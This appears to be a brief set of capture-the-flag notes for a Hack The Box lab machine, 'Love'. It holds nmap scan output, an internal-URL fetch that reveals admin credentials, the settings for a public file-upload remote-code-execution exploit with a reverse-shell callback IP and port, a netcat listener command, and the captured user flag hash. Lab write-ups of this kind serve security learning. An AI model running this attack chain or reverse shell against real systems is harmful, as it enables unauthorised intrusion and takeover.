10.10.10.239
ttl 127

[+]GATHERING INFORMATION[+]
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: Voting System using PHP
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvince
445/tcp  open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host '10.10.14.21' is not allowed to connect to this MariaDB server
5000/tcp open  http
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 41m36s, deviation: 4h02m29s, median: -1h38m23s
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-05-18T12:31:09
|_  start_date: N/A
| smb-os-discovery: 
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: Love
|   NetBIOS computer name: LOVE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2022-05-18T05:31:05-07:00



[+]ENUMERATION[+]

http://staging.love.htb/
index.php
beta.php >>   potential risk 

[+]LFI[+]
http://staging.love.htb/beta.php
Specify the file url: http://localhost:5000
[-]Credentials 
http://www.love.htb/admin/home.php
user : admin
pass : @LoveIsInTheAir!!!! 

[+]EXPLOIT[+]
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution).
https://www.exploit-db.com/exploits/49445


# --- Edit your settings here ----
IP = "www.love.htb" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.21" # Reverse shell IP
REV_PORT = "4444" # Reverse port 
# 


pyhton3 49445.py
nc -lvnp 4444

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe


C:\Users\Phoebe\Desktop>type user.txt
type user.txt
b46f133cc889e4396ffe345a3ebe78b0
